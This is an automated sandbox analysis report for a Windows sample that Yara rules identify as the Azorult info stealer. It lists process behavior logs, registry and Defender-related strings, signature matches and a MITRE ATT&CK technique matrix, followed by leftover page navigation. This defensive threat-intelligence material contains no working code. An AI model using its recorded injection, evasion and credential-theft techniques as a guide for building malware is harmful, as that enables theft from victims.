Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Queries volume information: C:\Users\user\AppData\Roaming\lpIWQr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

7_2_00404C15

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A2h6QhZIKx.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5176, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A2h6QhZIKx.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5176, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	11 Masquerading	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report A2h6QhZIKx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
A2h6QhZIKx.exe